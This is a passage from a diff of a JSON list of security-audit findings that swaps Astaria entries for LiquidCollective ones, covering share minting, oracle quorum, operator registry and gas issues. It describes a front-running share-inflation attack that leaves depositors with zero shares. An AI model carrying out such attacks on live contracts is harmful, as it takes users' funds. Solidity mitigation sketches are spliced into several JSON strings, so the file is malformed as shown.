(_underlyingAssetValue - 1) + 1 wei to the contract. This way, the victim will get 0 shares, but _underlyingAssetValue will still be pulled from its account balance. In this case, the attacker does not necessarily have to be a whitelisted user, and it is important to mention that the funds that were sent by him cannot be directly claimed back; rather, they will increase the price of the share. The attack vector mentioned above is the general front-runner case; the most profitable attack vector will be the case where the attacker is able to determine the share price (for instance, if the attacker mints the first share). In this scenario, the attacker will need to send at least attackerShares * (_underlyingAssetValue - 1) + 1 to the contract (attackerShares is completely controlled by the attacker, and thus can be 1).
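One common mitigation, sketched here with assumed helper signatures rather than the audited code, is to revert when the computed share amount rounds down to zero, so a front-run deposit fails loudly instead of silently donating the victim's funds:

pragma solidity ^0.8.10;

abstract contract SharesManagerSketch {
    error ZeroSharesMinted();

    function _totalSupply() internal view virtual returns (uint256);
    function _assetBalance() internal view virtual returns (uint256);
    function _mintRawShares(address owner, uint256 value) internal virtual;

    function _mintShares(address depositor, uint256 underlyingAssetValue) internal returns (uint256 shares) {
        // Balance held before this deposit's funds arrived.
        uint256 oldTotalAssetBalance = _assetBalance() - underlyingAssetValue;
        shares = oldTotalAssetBalance == 0
            ? underlyingAssetValue // first deposit: one share per wei
            : (underlyingAssetValue * _totalSupply()) / oldTotalAssetBalance;
        // Zero shares means the deposit would be donated to existing holders.
        if (shares == 0) revert ZeroSharesMinted();
        _mintRawShares(depositor, shares);
    }
}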
In our case, depositors are whitelisted, which makes this attack harder for a foreign attacker.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "Define a named constant for permit typehash in ERC20-cloned", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In permit, the following type hash has been used: keccak256( \"Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)\" )", + "title": "Orphaned (index, values) in SlotOperator storage slots in operatorsRegistry", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "If !opExists corresponds to an operator which has OperatorResolution.active set to false, the line below can leave some orphaned (index, values) in SlotOperator storage slots: _setOperatorIndex(name, newValue.active, r.value.length - 1);", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Low Risk" ] }, { - "title": "Unused struct, enum and storage fields can be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The struct, enum and storage fields in this context have not been used in the project.", + "title": "OperatorsRegistry.setOperatorName Possible front running attacks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "1. setOperatorName reverts for an already used name, which means that a call to setOperatorName might be front-run using the same name. The front-runner can launch the same attack again and again, thus causing a DoS for the original caller. 2. setOperatorName can be called either by an operator (to edit their own name) or by the admin. setOperatorName will revert for an already used _newName. The setOperatorName caller might be front-run by an identical transaction transmitted by someone else, which will lead to their transaction failing, where in practice this failure is a \"false failure\" since the desired change was already made.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Low" ] }, { - "title": "WPStorage.expected's comment can be made more accurate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In WPStorage's definition we have: uint88 expected; // Expected value of auctioned NFTs. yIntercept (virtual assets) of a PublicVault are ,! not modified on liquidation, only once an auction is completed. The comment for expected is not exactly accurate. The accumulated value in expected is the sum of all auctioned NFTs's amountOwed when (the timestamp) the liquidate function gets called. Whereas the NFTs get auctioned starting from their first stack's element's liquidationInitialAsk to 1_000 wei", + "title": "Prevent users from burning tokens via lsETH/wlsETH transfer or transferFrom functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of both lsETH (the SharesManager component of the River contract) and wlsETH allows the user to \"burn\" tokens, sending them directly to address(0) via the transfer and transferFrom functions.
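A guard of the kind this implies, as a sketch with assumed names (not the audited implementation): reject address(0) in the shared transfer path so supply can only shrink through the dedicated burn logic.

pragma solidity ^0.8.10;

abstract contract TransferGuardSketch {
    error UnauthorizedTransfer();

    mapping(address => uint256) internal balances;

    function _transfer(address from, address to, uint256 value) internal {
        // Transfers to address(0) must go through the burn function instead,
        // so total-supply bookkeeping cannot be bypassed.
        if (to == address(0)) revert UnauthorizedTransfer();
        balances[from] -= value;
        balances[to] += value;
    }
}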
Transferring tokens directly to address(0) this way would bypass the logic of the burn functions present in the protocol right now (or in the future, once withdrawals are enabled in River).", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Low Risk" ] }, { - "title": "Leave comment that in WithdrawProxy.claim() the calculation of balance cannot underflow", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There is this following line in claim() where balance is initialised: uint256 balance = ERC20(asset()).balanceOf(address(this)) - s.withdrawReserveReceived; With the current PublicVault implementation of IPublicVault, this cannot underflow since the increase in with- drawReserveReceived (using increaseWithdrawReserveReceived) is synced with increasing the asset balance by the same amount.", + "title": "In addOperator when emitting an event use stack variables instead of reading from memory again", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "In OperatorsRegistry's addOperator function, when emitting the AddedOperator event, we read from memory all the event parameters except operatorIndex. emit AddedOperator(operatorIndex, newOperator.name, newOperator.operator, newOperator.feeRecipient); We can avoid reading from memory to save gas.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "Shared logic in withdraw and redeem functions of WithdrawProxy can be turned into a shared modifier", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "withdraw and redeem both start with the following lines: WPStorage storage s = _loadSlot(); // If auction funds have been collected to the WithdrawProxy // but the PublicVault hasn't claimed its share, too much money will be sent to LPs if (s.finalAuctionEnd != 0) { // if finalAuctionEnd is 0, no auctions were added revert InvalidState(InvalidStates.NOT_CLAIMED); } Since they have this shared logic at the beginning of their body, we can consolidate the logic into a modifier.", + "title": "Rewrite pad64 so that it doesn't use BytesLib.concat and BytesLib.slice to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "We can avoid using BytesLib.concat and BytesLib.slice and write pad64 mostly in assembly, since the current implementation causes more memory expansion than needed (and is also not highly optimized).", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "StrategyDetails version can only be used in custom implementation of IStrategyValidator, requires documentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "StrategyDetails.version is never used in the current implementations of the validators. If the intention is to avoid replays across different versions of Astaria, we should add a check for it in commit- ment validation functions.
A custom implementation of IStrategyValidator can make use of this value, but this needs documentation as to exactly what it refers to.", + "title": "Cache r.value.length used in a loop condition to avoid reading from the storage multiple times.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "In a loop like the one below, consider caching the r.value.length value to avoid reading from storage on every round of the loop. for (uint256 idx = 0; idx < r.value.length;) {", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "Define helper functions to tag different pieces of cloned data for ClearingHouse", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "_getArgAddress(0) and _getArgUint256(21) are used as the ROUTER() and COLLATERAL_ID() in the fallback implementation for ClearingHouse was Clone derived contract.", + "title": "Rewrite the for loop in ValidatorKeys.sol::getKeys to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "A new modifier onlyVault() can be defined for WithdrawProxy to consolidate logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The following require statement has been used in multiple functions including increaseWith- drawReserveReceived, drain, setWithdrawRatio and handleNewLiquidation. require(msg.sender == VAULT(), \"only vault can call\");", + "title": "Operators.get in _getNextValidatorsFromActiveOperators can be replaced by Operators.getByIndex to avoid extra operations/gas.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Operators.get in _getNextValidatorsFromActiveOperators performs multiple checks that have been done before when Operators.getAllFundable() was called. This includes finding the index and checking if OperatorResolution.active is set. None of these are necessary.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "Inconsistant pragma versions and floating pragma versions can be avoided", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Most contracts in the project use pragma solidity 0.8.17, but there are other variants as well: 69 pragma solidity ^0.8.16; pragma solidity ^0.8.16; pragma solidity ^0.8.16; // src/Interfaces/IAstariaVaultBase.sol // src/Interfaces/IERC4626Base.sol // src/Interfaces/ITokenBase.sol pragma solidity ^0.8.15; // src/Interfaces/ICollateralToken.sol pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; // src/Interfaces/IERC20.sol // src/Interfaces/IERC165.sol // src/Interfaces/IERC1155.sol // src/Interfaces/IERC1155Receiver.sol // src/Interfaces/IERC721Receiver.sol // src/utils/Math.sol pragma solidity >=0.8.0; pragma solidity >=0.8.0; // src/Interfaces/IERC721.sol // src/utils/MerkleProofLib.sol And they all have floating version pragmas.
In hardhat.config.ts, solidity: \"0.8.13\" is used. In .prettierrc settings we have \"compiler\": \"0.8.17\" In .solhint.json we have \"compiler-version\": [\"error\", \"0.8.0\"] foundry.toml does not have a solc setting", + "title": "Avoid unnecessary equality checks with true in if statements", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Statements of the type if( condition == true) can be replaced with if(condition). The extra comparison with true is redundant.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "IBeacon is missing a compiler version pragma", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "IBeacon is missing a compiler version pragma.", + "title": "Rewrite OperatorRegistry.getOperatorDetails to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "In getOperatorDetails the 1st line is: _index = Operators.indexOf(_name); Since we already have the _index from this line, we can use it along with getByIndex to retrieve the _operatorAddress. This would reduce the gas cost significantly, since Operators.get(_name) calls Operators._getOperatorIndex(name) to find the _index again. testExecutorCanSetOperatorLimit() (gas: -1086 (-0.001%)) testGovernorCanSetOperatorLimit() (gas: -1086 (-0.001%)) testUserDepositsForAnotherUser() (gas: -2172 (-0.001%)) testDeniedUser() (gas: -2172 (-0.001%)) testELFeeRecipientPullFunds() (gas: -2172 (-0.001%)) testUserDepositsUnconventionalDeposits() (gas: -2172 (-0.001%)) testUserDeposits() (gas: -2172 (-0.001%)) testNoELFeeRecipient() (gas: -2172 (-0.001%)) testUserDepositsTenPercentFee() (gas: -2172 (-0.001%)) testUserDepositsFullAllowance() (gas: -2172 (-0.001%)) testValidatorsPenaltiesEqualToExecLayerFees() (gas: -2172 (-0.001%)) testValidatorsPenalties() (gas: -2172 (-0.001%)) testUserDepositsOperatorWithStoppedValiadtors() (gas: -3258 (-0.002%)) testMakingFunctionGovernorOnly() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorLimit() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorStatus() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorStoppedValidatorCount() (gas: -1086 (-0.005%)) testExecutorCanSetOperatorStoppedValidatorCount() (gas: -1086 (-0.006%)) testGovernorCanSetOperatorStatus() (gas: -1086 (-0.006%)) testGovernorCanSetOperatorStoppedValidatorCount() (gas: -1086 (-0.006%)) testGovernorCanAddOperator() (gas: -1086 (-0.006%)) testExecutorCanSetOperatorStatus() (gas: -1086 (-0.006%)) Overall gas change: -36924 (-0.062%) Also note that when the operator is not OperatorResolution.active, _index becomes -1 in both cases. With the suggested change, if _index is -1, then uint256(_index) == type(uint256).max, which would cause getByIndex to revert with OperatorNotFoundAtIndex(index). But with the current code, it will revert with an index out-of-bounds type of error.
_operatorAddress = Operators.getByIndex(uint256(_index)).operator;", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "zone and zoneHash are not required for fully open Seaport orders", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "As per Seaport's documentation,zone and zoneHash are not required for PUBLIC orders: The zone of the order is an optional secondary account attached to the order with two additional privi- leges: The zone may cancel orders where it is named as the zone by calling cancel. (Note that offerers can also cancel their own orders, either individually or for all orders signed with their current counter at once by calling incrementCounter). \"Restricted\" orders (as specified by the order type) must either be executed by the zone or the offerer, or must be approved as indicated by a call to an isValidOrder or isValidOrderIncludingEx- traData view function on the zone. 70 This order isn't \"Restricted\", and there is no way to cancel a Seaport order once created from this contract.", + "title": "Rewrite/simplify OracleV1.isMember to save gas.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "OracleV1.isMember can be simplified to save gas.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "Inconsistent treatment of delegate setting", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Private vaults include delegate in the allow list when deployed through the Router. Public vaults do not. The VaultImplementation, when mutating a delegate, sets them on allow list.", + "title": "Cache the beaconSpec.secondsPerSlot * beaconSpec.slotsPerEpoch multiplication to save gas.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The calculation for _startTime and _endTime uses more multiplication than is necessary.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "AstariaRouter does not adhere to EIP1967 spec", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The Router serves as an implementation Beacon for proxy contracts, however, does not adhere to the EIP1967 spec.", + "title": "_rewardOperators could save gas by skipping operators with no active and funded validators", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "_rewardOperators is the River function that distributes the earned rewards to each active operator based on the amount of active validators. The function iterates over the list of active operators returned by OperatorsRegistryV1.listActiveOperators, calculating the total amount of active and funded validators (funded-stopped) and the number of active and funded validators (funded-stopped) for each operator. Because of the current code, the final temporary array validatorCounts could have some item that contains 0 if the operator in the index position had no more active validators.
This means that: 1) gas has been wasted during the loop, 2) gas will be wasted in the second loop by distributing 0 shares to an operator without active and funded validators, and 3) _mintRawShares will be executed without minting any shares while still emitting a Transfer event", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Gas Optimization" ] }, { - "title": "Receiver of bought out lien must be approved by msg.sender", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The buyoutLien function requires that either the receiver of the lien is msg.sender or is an address approved by msg.sender: if (msg.sender != params.encumber.receiver) { require( _loadERC721Slot().isApprovedForAll[msg.sender][params.encumber.receiver] ); } This check seems unnecessary and in some cases will block users from buying out liens as intended.", + "title": "Consider adding a strict check to prevent the Oracle admin from adding more than 256 members", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "At the time of writing this issue, in the latest commit at 030b52feb5af2dd2ad23da0d512c5b0e55eb8259, in the natspec docs of OracleMembers there is a @dev comment that says: There can only be up to 256 oracle members. This is due to how report statuses are stored in Reports Positions. If we look at ReportsPositions.sol, the natspec docs explain that each bit in the stored uint256 value tells if the member at a given index has reported. But both Oracle.addMember and OracleMembers.push do not prevent the admin from adding more than 256 items to the list of oracle members. If we look at the result of the test (located in the Appendix), we can see that: It's possible to add more than 256 oracle members. The result of oracle.getMemberReportStatus(oracleMember257) returns true even if the oracle member has not reported yet. Because of that, oracle.reportConsensusLayerData (executed by oracleMember257) reverts correctly. If we remove a member from the list (for example, the oracle member with index 1), oracleMember257 will be able to vote, because it will be swapped with the removed member, and at this point oracle.getMemberReportStatus(oracleMember257) returns false.
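The strict check could be enforced where members are appended; a minimal sketch with assumed names:

pragma solidity ^0.8.10;

library OracleMembersSketch {
    error TooManyMembers();

    // Report bitmaps are packed into a single uint256, one bit per member,
    // so the member list must never exceed 256 entries.
    uint256 internal constant MAX_MEMBERS = 256;

    function push(address[] storage members, address newMember) internal {
        if (members.length >= MAX_MEMBERS) revert TooManyMembers();
        members.push(newMember);
    }
}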
", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "A new modifer onlyLienToken() can be defined to refactor logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The following require statement has been used in multiple locations in PublicVault: require(msg.sender == address(LIEN_TOKEN())); Locations used: beforePayment afterPayment handleBuyoutLien updateAfterLiquidationPayment updateVaultAfterLiquidation", + "title": "ApprovalsPerOwner.set does not check if owner or spender is address(0).", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "When the ApprovalsPerOwner value is set for an owner and a spender, the addresses of the owner and the spender are not checked against address(0).", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "A redundant if block can be removed from PublicVault._afterCommitToLien", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In PublicVault._afterCommitToLien, we have the following if block: if (s.last == 0) { s.last = block.timestamp.safeCastTo40(); } This if block is redundant, since regardless of the value of s.last, a few lines before _accrue(s) would update the s.last to the current timestamp.", + "title": "Quorum could be higher than the number of oracles, DOSing the Oracle contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of Oracle.setQuorum only checks if the _newQuorum input parameter is not 0 or equal to the current quorum value. By setting a quorum higher than the number of oracle members, no quorum could be reached for the current or future slots.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Private vaults' deposit endpoints can be potentially simplifed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "A private vault's deposit function can be called directly or indirectly using the ROUTER() (either way by anyone) and we have the following require statement: require( s.allowList[msg.sender] || (msg.sender == address(ROUTER()) && s.allowList[receiver]) ); If the ROUTER() is the AstariaRouter implementation of IAstariaRouter, then it inherits from ERC4626RouterBase and ERC4626Router which allows anyone to call into deposit of this private vault using: depositToVault depositMax ERC4626RouterBase.deposit Thus if anyone of the above functions is called through the ROUTER(), msg.sender == address(ROUTER() will be true. Also, note that when private vaults are created using the newVault the msg.sender/owner along the delegate are added to the allowList and allowlist is enabled. And since there is no bookkeeping here for the receiver, except only the require statement, that means Only the owner or the delegate of this private vault can call directly into deposit or Anyone else can set the address to parameter of one of those 3 endpoints above to owner or delegate to deposit assets (wETH in the current implementation) into the private vault.
And all the assets can be withdrawn by the owner only.", + "title": "ConsensusLayerDepositManager.depositToConsensusLayer should be called only after a quorum has been reached to avoid rewarding validators that have not performed during the frame", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Alluvial is not tracking timestamps or additional information for some actions that happen on-chain, like: when an operator's validator is funded on the beacon chain; when an operator is added; when validators are added or removed; when a quorum is reached; when rewards/penalties/slashes happen and which validator is involved; and so on. By not having this enriched information, it could happen that validators that have not contributed to a frame will still get rewards, which could be unfair to other validators that have contributed to the overall balance by working and bringing rewards. Let's take an example: we have 10 operators with 1k validators each at the start of a frame. At some point, at the very end of the frame, the 10th operator gets 9k validators approved and all of them get funded. Those validators participated in only a small fraction of the production of the rewards. But because there's no way to track this timing, and because oracles do not know anything about it (they just need to report the balance and the number of validators during the frame), they will report and arrive at a quorum on reportBeacon(correctEpoch, correctAmountOfBalance, 21_000), which will trigger OracleManagerV1.setBeaconData. The contract's check that 21_000 > DepositedValidatorCount.get() will pass and _onEarnings is called. Let's not consider the math involved in the process of calculating the number of shares to be distributed based on the staked balance delta; let's say that, because of all the increase in capital, Alluvial will call _rewardOperators(1_000_000); distributing 1_000_000 shares to operators based on the number of validators that produced that reward. Because, as we said, we do not know how much each validator has contributed, those shares will be distributed in the same way to operators that might not have contributed at all to the epoch. This is true both for validators that joined and for validators that exited the beacon chain after the start of the epoch where the last quorum was set.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "The require statement in decreaseEpochLienCount can be more strict", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "decreaseEpochLienCount has the following require statement that limits who can call into it: require( msg.sender == address(ROUTER()) || msg.sender == address(LIEN_TOKEN()) ); So only, the ROUTER() and LIEN_TOKEN() are allowed to call into. But AstariaRouter never calls into this function.", + "title": "Document the decision to include executionLayerFees in the logic to trigger _onEarnings to distribute rewards to Operators and Treasury", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The setBeaconData function from the OracleManager contract is called when oracle members have reached a quorum.
After checking that the report data respects some integrity checks, the function performs a check to distribute rewards to operators and the treasury if needed: uint256 executionLayerFees = _pullELFees(); if (previousValidatorBalanceSum < _validatorBalanceSum + executionLayerFees) { _onEarnings((_validatorBalanceSum + executionLayerFees) - previousValidatorBalanceSum); } The delta between _validatorBalanceSum and previousValidatorBalanceSum is the sum of all the rewards, penalties and slashes that validators have accumulated during the validation work of one or multiple frames. By adding executionLayerFees to the check, it means that even if the validators have performed poorly (the sum of rewards is less than the sum of penalties + slashes) they could still get rewards if executionLayerFees is greater than the negative delta of newSum-prevSum. If we look at the natspec of _onEarnings, it seems that only the validator's balance (without fees) should be used in the if check. /// @notice Handler called if the delta between the last and new validator balance sum is positive /// @dev Must be overriden /// @param _profits The positive increase in the validator balance sum (staking rewards) function _onEarnings(uint256 _profits) internal virtual;", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "amount is not used in _afterCommitToLien", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "amount is not used in _afterCommitToLien to update/decrement s.yIntercept, because even though assets have been transferred out of the vault, they would still need to be paid back and so the net ef- fect on s.yIntercept (that is used in the calculation of the total virtual assets) is 0.", + "title": "Consider documenting how and if funds from the execution layer fee recipient are considered inside the annualAprUpperBound and relativeLowerBound boundaries.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "When oracle members reach a quorum, the _pushToRiver function is called. Alluvial performs some sanity checks to prevent a malicious oracle member from reporting malicious beacon data. Inside the function: uint256 prevTotalEth = IRiverV1(payable(address(riverAddress))).totalUnderlyingSupply(); riverAddress.setBeaconData(_validatorCount, _balanceSum, bytes32(_epochId)); uint256 postTotalEth = IRiverV1(payable(address(riverAddress))).totalUnderlyingSupply(); uint256 timeElapsed = (_epochId - LastEpochId.get()) * _beaconSpec.slotsPerEpoch * _beaconSpec.secondsPerSlot; _sanityChecks(postTotalEth, prevTotalEth, timeElapsed); function _sanityChecks(uint256 _postTotalEth, uint256 _prevTotalEth, uint256 _timeElapsed) internal view { if (_postTotalEth >= _prevTotalEth) { uint256 annualAprUpperBound = BeaconReportBounds.get().annualAprUpperBound; if ( uint256(10000 * 365 days) * (_postTotalEth - _prevTotalEth) > annualAprUpperBound * _prevTotalEth * _timeElapsed ) { revert BeaconBalanceIncreaseOutOfBounds(_prevTotalEth, _postTotalEth, _timeElapsed, annualAprUpperBound); } } else { uint256 relativeLowerBound = BeaconReportBounds.get().relativeLowerBound; if (uint256(10000) * (_prevTotalEth - _postTotalEth) > relativeLowerBound * _prevTotalEth) { revert BeaconBalanceDecreaseOutOfBounds(_prevTotalEth, _postTotalEth, _timeElapsed, relativeLowerBound); } } }
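To make the upper bound concrete: a report with a balance increase is accepted only while 10000 * 365 days * (_postTotalEth - _prevTotalEth) <= annualAprUpperBound * _prevTotalEth * _timeElapsed, i.e. the relative increase may not exceed (annualAprUpperBound / 10000) * (_timeElapsed / 365 days). As an illustrative example (the deployed bound is a configuration value): with annualAprUpperBound = 1000 (a 10% APR cap) and roughly one day elapsed, the reported balance may grow by at most about 0.10 / 365, i.e. roughly 0.027% of _prevTotalEth, before the report reverts.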
Both prevTotalEth and postTotalEth call SharesManager.totalUnderlyingSupply(), which returns the value from River._assetBalance(). That balance also includes the amount of fees that are pulled from the ELFeeRecipient (Execution Layer Fee Recipient). Alluvial should document how and if funds from the execution layer fee recipient are also considered inside the annualAprUpperBound and relativeLowerBound boundaries.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Use modifier", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Highlighted code have require checks on msg.sender which can be converted to modifiers. For instance: require(address(msg.sender) == s.guardian);", + "title": "Allowlist.allow allows arbitrary values for _statuses input", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of allow does not check if the value inside each _statuses item is a valid value or not. The function can be called by either the administrator or the allower (roles authorized to manage the user permissions), who can specify arbitrary values to be assigned to the corresponding _accounts item. The user's permissions handled by Allowlist are then used by the River contract in different parts of the code. Those permissions inside the River contracts are a limited set of permissions that might not match what the allower/admin of the Allowlist has used to update a user's permission when the allow function was called.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Prefer SafeCastLib for typecasting", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Highlighted code above does typecasting of several constant values. In case, some value doesn't fit in the type, this typecasting will silently ignore the higher order bits although that's currently not the case, but it may pose a risk if these values are changed in future.", + "title": "Consider exploring a way to update the withdrawal credentials and document all the possible scenarios", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The withdrawal credentials is currently set when River.initRiverV1 is called. The function will internally call ConsensusLayerDepositManager.initConsensusLayerDepositManagerV1, which will perform WithdrawalCredentials.set(_withdrawalCredentials); After initializing the withdrawal credentials, there's no way to update or change it. The withdrawal credentials is a key part of the whole protocol, and everything that concerns it should be well documented, including all the worst-case scenarios: What if the withdrawal credentials is lost? What if the withdrawal credentials is compromised? What if the withdrawal credentials must be changed (lost, compromised or simply the wrong one has been submitted)? What should be implemented inside the Alluvial logic to use the new withdrawal credentials for the operator's validators that have not been funded yet (the old withdrawal credentials has not been sent to the Deposit contract)?
Note that currently there seems to be no way to update the withdrawal credentials for a validator already submitted to the Deposit contract.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Rename Multicall to Multidelegatecall", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Multicall.sol lets performs multiple delegatecalls. Hence, the name Multicall is not suitable. The contract and the file should be named Multidelegatecall.", + "title": "Oracle contract allows members to skip frames and report them (even if they are past) one by one or all at once", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of reportBeacon allows oracle members to skip frames (255 epochs) and report them (even if they are past) one by one or all at once. Let's assume that members arrived at a quorum for epochId_X. When the quorum is reached, _pushToRiver is called, and it will update the following properties: clean all the storage used for member reporting; set ExpectedEpochId to epochId_X + 255; set LastEpochId to epochId_X. With this context, let's assume that members decide to wait 30 frames (30 days), or that for 30 days they cannot arrive at a quorum. At the new time, the new epoch would be epochId_X + 255 * 30. The following scenarios can happen: 1) Report all the missed epochs at once. Instead of reporting only the current epoch (epochId_X + 255 * 30), they will report all the previous \"skipped\" epochs that are in the past. In this scenario, ExpectedEpochId contains the number of the expected next epoch, assigned 30 days ago by the previous call to _pushToRiver. In reportBeacon, if the _epochId is what the system expects (equal to ExpectedEpochId), the report can go on. So, to be able to report all the missing reports of the \"skipped\" frames, the member just needs to call in sequence reportBeacon(epochId_X + 255, ...), reportBeacon(epochId_X + 255 + 255, ...), ..., reportBeacon(epochId_X + 255 * 30, ...). 2) Report only the last epoch. In this scenario, they would directly call reportBeacon(epochId_X + 255 * 30, ...). 